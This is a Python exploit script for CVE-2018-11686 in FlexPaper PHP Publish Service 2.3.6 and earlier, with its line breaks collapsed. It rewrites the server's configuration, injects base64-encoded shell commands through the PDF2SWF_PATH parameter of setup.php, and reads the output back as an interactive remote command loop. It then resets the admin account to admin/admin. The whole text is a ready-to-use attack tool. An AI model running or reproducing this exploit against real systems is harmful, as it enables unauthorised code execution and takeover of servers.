import base64 import requests import sys import re remote = "http://127.0.0.1:8888" ressource = "/flexpaper" proxy = { 'http': "http://127.0.0.1:8080" } if __name__ == "__main__": print("\nCVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6\n") print("[+] Checking if ressource available =>", end=' ') burp0_url = remote + ressource + "/php/change_config.php" r = requests.get(burp0_url, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 302: print("\033[92mOK\033[0m") else: print("KO") sys.exit() while True: try: command = input("command (\033[92mreflected\033[0m)> ") if command == "exit": print("Exiting...") break command = base64.b64encode(command.encode('utf-8')) command_str = command.decode('utf-8') command_str = command_str.replace('/', '+') print("[+] Cleaning config directory =>", end=' ') burp0_url = remote + ressource + "/php/change_config.php" burp0_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"SAVE_CONFIG": "1", "PDF_Directory": "a", "SWF_Directory": "config/", "LICENSEKEY": "a", "SPLITMODE": "a", "RenderingOrder_PRIM": "a", "RenderingOrder_SEC": "a"} r = requests.post(burp0_url, proxies=proxy, data=burp0_data, verify=False, allow_redirects=False) r = requests.post(burp0_url, proxies=proxy, data=burp0_data, verify=False) # little hack if r.status_code == 200 and "index.php?msg=Configuration%20saved!" in r.url: print("\033[92mOK\033[0m") else: print("KO") sys.exit() print("[+] Executing command =>", end=' ') burp0_url = remote + ressource + \ "/php/setup.php?step=4&PDF2SWF_PATH=echo+" + \ command_str + "+|+base64+-d+|+sh+>config/output.txt%3b" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"} requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=True) if "index.php" in r.url: print("\033[92mOK\033[0m") else: print("KO") sys.exit() print("[+] Getting result =>", end=' ') burp0_url = remote + ressource + "/php/config/output.txt" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close"} r = requests.get(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False) if r.status_code == 200: print("\033[92mOK\033[0m") print(r.text) else: print("KO") sys.exit() print("[+] Reset config of FlexPaper =>", end=' ') burp0_url = remote + ressource + \ "/php/setup.php?step=4" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"ADMIN_USERNAME": "admin", "ADMIN_PASSWORD": "admin"} requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy, verify=False, allow_redirects=True) if r.status_code == 200: print("\033[92mOK\033[0m") else: print("KO") sys.exit() except KeyboardInterrupt: print("Exiting...") break